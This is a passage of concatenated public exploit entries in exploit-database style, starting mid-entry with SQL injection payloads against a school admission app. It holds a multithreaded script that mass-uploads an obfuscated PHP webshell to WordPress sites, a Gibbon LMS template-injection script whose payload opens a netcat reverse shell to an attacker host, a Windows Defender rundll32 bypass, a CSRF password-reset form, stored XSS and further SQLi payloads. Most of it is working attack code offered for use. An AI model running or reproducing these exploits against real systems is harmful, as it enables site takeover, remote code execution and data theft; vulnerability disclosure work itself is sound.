to SQLi --- Parameter: searchdata[0][title] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[0][searchfield] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[0][searchvalue] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[1][title] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[1][searchvalue] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z --- ------------------------------------------- POST /course/filterRecords/ HTTP/1.1 searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi] ------------------------------------------- Path: /online_admission --- Parameter: MULTIPART email ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385-- --- POST Parameter 'email' is vulnerable to SQLi POST /online_admission HTTP/1.1 -----------------------------320375734131102816923531485385 Content-Disposition: form-data; name="email" *[SQLi] -----------------------------320375734131102816923531485385 [-] Done

# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) # Date: 2024-02-25 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re , json from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} uploader = """ GIF89a <?php ?> <!DOCTYPE html> <html> <head> <title>Resultz</title> </head> <body><h1>Uploader</h1> <form enctype='multipart/form-data' action='' method='POST'> <p>Uploaded</p> <input type='file' name='uploaded_file'></input><br /> <input type='submit' value='Upload'></input> </form> </body> </html> <?PHP if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?> """ requests.urllib3.disable_warnings() def Exploit(Domain): try: if 'http' in Domain: Domain = Domain else: Domain = 'http://'+Domain myup = {'': ('db.php', uploader)} req = requests.post(Domain + '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload', files=myup, headers=headers,verify=False, timeout=10).text req1 = requests.get(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php') if 'Ex3ptionaL' in req1: print (fg+'[+] '+ Domain + ' --> Shell Uploaded') open('Shellz.txt', 'a').write(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n') else: print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability') except: print(fr+' -| ' + Domain + ' --> {} [Failed]') target = open(input(fm+"Site List: "), "r").read().splitlines() mp = Pool(int(input(fm+"Threads: "))) mp.map(Exploit, target) mp.close() mp.join()

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again. The fix was short lived as I find yet another third trivial bypass soon after. [Exploit/POC] Open command prompt as Administrator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13) Access is denied. C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX') [Video PoC URL] https://www.youtube.com/watch?v=yn9gdJ7c7Kg [Network Access] Local [Severity] High [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt https://twitter.com/hyp3rlinx/status/1755417914599956833 https://twitter.com/hyp3rlinx/status/1758624140213264601 [Disclosure Timeline] Vendor Notification: February 16, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF # Application: Casdoor # Version: <= 1.331.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor # Tested on: Windows # CVE : CVE-2023-34927 Overview ================================================== Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL. Proof of Concept ================================================== Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step <html> <form action="http://localhost:8000/api/set-password" method="POST"> <input name='userOwner' value='built&#45;in' type='hidden'> <input name='userName' value='admin' type='hidden'> <input name='newPassword' value='hacked' type='hidden'> <input type=submit> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </html> If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials userOwner: built&#45;in userName: admin newPassword: hacked

# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting # Date: 2023-09-25 # Exploit Author: Vinnie McRae - RedTeamer IT Security # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.7) and older version of Axigen WebMail # Tested on: firefox, chrome # CVE: CVE-2023-48974 Description The `serverName_input` parameter is vulnerable to stored cross-site scripting (XSS) due to unsanitized or unfiltered processing. This means that an attacker can inject malicious code into this parameter, which will then be executed by other users when they view the page where the parameter is used. This is affecting authenticated administrators, and the attack can be used to attack other administrators with more permissions. Exploitation 1. Login as administrator 2. Navigate to "global settings" 3. Change server name to <script>alert(1)</script> PoC of the POST request: ``` POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1 Host: localhost:9443 Cookie: eula=true; WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D; webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true; public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52; menuLeftTopPosition=-754 Content-Type: multipart/form-data; boundary=---------------------------41639384187581032291088896642 Content-Length: 12401 Connection: close -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="serverName_input" <script>alert(1)</script> -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="primary_domain_input" axigen -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="ssl_random_file_input" --SNIP-- -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="update" Save Configuration -----------------------------41639384187581032291088896642-- ``` #______________________________ #Vinnie McRae #RedTeamer IT Security #Blog: redteamer.de/blog-beitrag/

# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability # Date: 21.01.2024 # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24724 import requests import re import sys def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie']) if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']): print("login successful!") return Session_Cookie[4] def rce(cookie, target_host, target_port, attacker_ip, attacker_port): url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie} data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) if 'success0' in str(r.headers['Location']): print("Payload uploaded successfully!") def trigger(cookie, target_host, target_port): url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0' headers = {"Cookie": cookie} print("RCE successful!") r = requests.get(url, headers=headers, allow_redirects=False) if __name__ == '__main__': if len(sys.argv) != 7: print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>") sys.exit(1) cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6]) rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]) trigger(cookie, sys.argv[1], sys.argv[2])

# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2024-04-01 # Vendor : https://www.eset.com # Version : 17.0.16.0 # Tested on OS: Microsoft Windows 10 pro x64 C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET Security\ekrn.exe C:\>sc qc ekrn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ekrn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe" LOAD_ORDER_GROUP : Base TAG : 0 DISPLAY_NAME : ESET Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation

# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi # Author: nu11secur1ty # Date: 03/28/2024 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 # Reference: https://portswigger.net/web-security/sql-injection # Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN (2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user/manage_user&id=7''' AND (SELECT 1734 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM (SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: page=user/manage_user&id=-2854' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL# ---

# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path # Date: 2024-04-01 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: http://anydesk.com # Software Link: http://anydesk.com/download # Version: Software Version 7.0.15 # Tested on: Windows 10 Pro x64 1. Description: The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof C:\>sc qc anydesk [SC] QueryServiceConfig SUCCESS SERVICE_NAME: anydesk TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AnyDesk Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation